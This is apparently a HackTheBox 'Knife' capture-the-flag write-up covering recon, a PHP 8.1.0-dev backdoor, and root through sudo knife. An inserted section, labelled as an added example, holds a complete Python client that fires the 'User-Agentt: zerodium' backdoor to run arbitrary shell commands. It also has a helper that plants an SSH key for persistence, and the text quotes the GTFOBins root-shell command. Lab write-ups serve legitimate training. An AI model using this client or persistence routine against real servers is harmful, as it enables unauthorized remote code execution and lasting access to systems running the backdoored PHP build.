026#:HTB - Knife

Knife - Title Card

     It feels like I haven’t hacked in ages at this point. Checking my post history, I haven’t done a room in over a month (since I started working on the WiFi Pineapple). Let’s see how rusty I got in that time.

Knife - Nmap

     Only two ports open. Not much to do besides starting a directory scan and checking out the website.

Knife - Gobuster 1
Knife - Site 1

     Our first gobuster scan didn’t return anything useful, so I resorted to just exploring the site and its source code. There was some JS in there for visual effects, but I don’t think I see anything usable here. Lacking direction, I ran another gobuster scan with a larger wordlist. While that ran, I also started looking into vulns for MikroTik but didn’t find anything that applies to the version we discovered.

     I am probably missing something obvious, but after a while of getting nowhere I used the guided questions to get me back on track. Task 2 asks us about the version of PHP used. I found this info by intercepting the response in Burp Suite.

Knife - Burp 1

     I checked searchsploit for anything against ‘php 8.’, which produced a landslide of results. I ran my search again against ‘php 8.1.0-dev’ and got a more manageable response.

Knife - Searchsploit 1

     One of these actually hits on the full string we provided, and it’s an RCE exploit. Seems like a good place to start. I copied the exploit to my local directory and began reviewing it. The first time it failed, but then I was able to get initial access with it.

Knife - Exploit 1

     I can’t seem to change my directory, but I’m able to poke around a little still. I found the first flag in the /home/james/ directory.
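     The following is an added example, not the searchsploit script used in this post and not code from the original page. It is a minimal client for the PHP 8.1.0-dev backdoor that the searchsploit hit targets. Background that the post itself does not spell out: the 8.1.0-dev build carried the March 2021 php-src backdoor, which, before the requested script runs, checks whether the User-Agentt request header contains "zerodium" and, if so, passes everything after the first eight characters of the header value to zend_eval_string() as PHP. The target URL, the "__KNIFE_OUT__" marker, the public key and the home directory used below are all placeholders of mine. The code also shows why the resulting "shell" cannot change directory: each command is a separate request and therefore a separate process, so state must be carried by chaining commands in one request. The last helper covers the route back in described later in the post, dropping an SSH public key rather than fighting for a reverse shell.

```python
"""
Client for the PHP 8.1.0-dev 'User-Agentt' backdoor.

Added example, not the searchsploit script used in the post. The target URL
in __main__, the output marker, the key and the home directory are assumed
placeholders.

Background (not stated on the original page): on a backdoored 8.1.0-dev
build, a request whose User-Agentt header contains "zerodium" has the header
value from offset 8 onward executed as PHP before the requested page runs.
"""
import http.client
import shlex
from urllib.parse import urlsplit

TRIGGER = "zerodium"       # the header value must start with this
MARK = "__KNIFE_OUT__"     # assumed delimiter so command output can be cut out of the page HTML


def php_single_quote(s: str) -> str:
    """Escape s for use inside a PHP single-quoted string literal."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def build_php(cmd: str) -> str:
    """PHP that runs cmd via system() and fences its output with MARK."""
    if "\r" in cmd or "\n" in cmd:
        raise ValueError("header values cannot contain CR/LF")
    return f"echo '{MARK}'; system('{php_single_quote(cmd)}'); echo '{MARK}';"


def build_headers(cmd: str) -> dict:
    """The single header that triggers the backdoor."""
    return {"User-Agentt": TRIGGER + build_php(cmd)}


def extract_output(body: str):
    """Text between the two markers, or None if the backdoor did not fire."""
    parts = body.split(MARK)
    if len(parts) < 3:
        return None
    return parts[1]


def run(url: str, cmd: str, timeout: float = 10):
    """Execute one shell command on the target and return its output.

    Every call is a separate HTTP request and therefore a separate `sh -c`
    process: a `cd` in one call does not affect the next, which is why the
    exploit shell cannot change directory. Use chain() to keep state.
    """
    u = urlsplit(url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request("GET", u.path or "/", headers=build_headers(cmd))
        body = conn.getresponse().read().decode(errors="replace")
    finally:
        conn.close()
    return extract_output(body)


def chain(*cmds: str) -> str:
    """Join commands so they run in one process (cwd and variables carry over)."""
    return "; ".join(cmds)


def ssh_key_drop(pubkey: str, home: str) -> str:
    """Shell command that installs pubkey into home/.ssh/authorized_keys.

    `home` is assumed to be the home directory of the user the web server
    runs as; the key line is shell-quoted so it survives `sh -c`.
    """
    base = home.rstrip("/")
    ssh_dir = shlex.quote(base + "/.ssh")
    auth = shlex.quote(base + "/.ssh/authorized_keys")
    return (f"mkdir -p {ssh_dir} && chmod 700 {ssh_dir} && "
            f"printf '%s\\n' {shlex.quote(pubkey)} >> {auth} && chmod 600 {auth}")


if __name__ == "__main__":
    target = "http://TARGET/"   # assumed placeholder; replace with the box address
    print(run(target, "id"))
    # cwd only carries over inside a single request:
    print(run(target, chain("cd /home/james", "ls -la")))
```

     The GTFOBins step the post takes for root, `sudo knife exec -E 'exec "/bin/sh"'`, spawns an interactive /bin/sh attached to the caller's terminal. A request-per-command channel like the one above has no terminal to hand it, which is the session problem the post runs into; sending `ssh_key_drop(...)` through `run()` and logging in over SSH gives a proper tty for that step.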

     I checked what sudo permissions our user has and it looks like we can run /usr/bin/knife as admin. Let’s go see what knife is.

Knife - Sudo

     The full file is too large to fit in a single pic. I’m not entirely sure what I am looking at, but it looks like it might be a real application and not something made for this room. I started looking into knife on Linux and found this. It looks like it is a part of the Chef app, and with that in mind I can confirm mentions of Chef in the file. Now let’s try to find the version, since this is probably our privilege escalation path.

     That was easy enough. I originally started looking for vulns, but then decided to try to just edit the knife file myself. This failed and I started reading more about Knife on their documentation page I linked earlier. This entry seemed like it could be abused to get us a reverse shell.

Knife - Knife Manual 1

     I grabbed pentestmonkey’s Ruby reverse shell script and tried a few times to get it to execute, without luck. I decided to check GTFOBins, and it turns out I was very close to getting there on my own, though my syntax was wrong. I also didn’t need to try for a reverse shell, since I could just launch a shell as root.

     This doesn’t work though, and after some tinkering I am left thinking that it’s our session that is causing my issue now. I tried again for a reverse shell but ended up just making an SSH key instead.

Knife - SSH Keygen
Knife - SSH 2
Knife - SSH 3

     Now that we are back in, let’s see if our privilege escalation will work.

Knife - Flag 2

     As we see, it worked and we got our final flag. This definitely highlights the importance of stabilizing or upgrading your shell session where possible.

[CATZ....HACKS]
